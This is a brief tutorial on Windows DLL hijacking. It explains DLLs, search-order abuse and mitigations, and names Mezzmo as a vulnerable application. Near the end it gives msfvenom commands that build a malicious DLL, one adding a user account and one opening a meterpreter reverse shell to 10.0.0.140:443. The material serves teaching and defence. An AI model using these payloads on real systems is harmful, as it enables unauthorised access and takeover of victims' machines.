DLL Hijacking

What is a DllDynamic Link Libraries (DLL)s are like EXEs but they are not directly executable. That is to say, DLLs are Microsoft's implementation of shared libraries.DLLs are so much like an EXE that the file format itself is the same. Both EXE and DLLs are based on the Portable Executable (PE) file format.

Why use a Dll

In order to execute a program it must be loaded in main memory.

If an entire .exe file is executed it is copied to main memory. Using library functions dynamically allows the .exe to be smaller because functions can be called whenever required. Hence memory utilization can be saved.

Dynamic linking has the following advantages:

Saves memory and reduces swapping. Many processes can use a single DLL simultaneously, sharing a single copy of the DLL in memory. In contrast, Windows must load a copy of the library code into memory for each application that is built with a static link library.

Saves disk space. Many applications can share a single copy of the DLL on disk. In contrast, each application built with a static link library has the library code linked into its executable image as a separate copy.

Upgrades to the DLL are easier. When the functions in a DLL change, the applications that use them do not need to be recompiled or relinked as long as the function arguments and return values do not change. In contrast, statically linked object code requires that the application be relinked when the functions change.

Provides after-market support. For example, a display driver DLL can be modified to support a display that was not available when the application was shipped.

The Difference? DLL Hijacking is when you abuse the library

search order to gain execution in a process. Being able to write to the directory an executable resides in allows a malicious actor the ability to drop a dll with the same name as one the executable will request via LoadLibrary. When the executable attempts to load the expected library, they will instead load the malicious one.

DLL Injection on the other hand is where a running process is manipulated to load a desired library. 

Vulnerable Application Mezzmo Latest Version

How to Check?

Get a Dll that shows a message box or create one as per your requirement.

Replace the original Dll with the malicious one.

Trial and Error.

Automated Tool

Dll Hijack Auditor

Dll Crafting

Compile it yourself using code from Exploit-db

Obtain a Compiled Dll as POC Use Metasploit to craft a malicious

Dllmsfvenom -p windows/adduser -i 30 -f dll > one.dll

msfvenom -p windows/meterpreter/reverse_tcp Lhost=10.0.0.140 Lport=443 -i 30 -f dll > two.dll

Mitigation

Use signed Dll’s. Dll Encryption/Obfuscation. Integrity Check using Checksum of

file. Use HardCoded Path.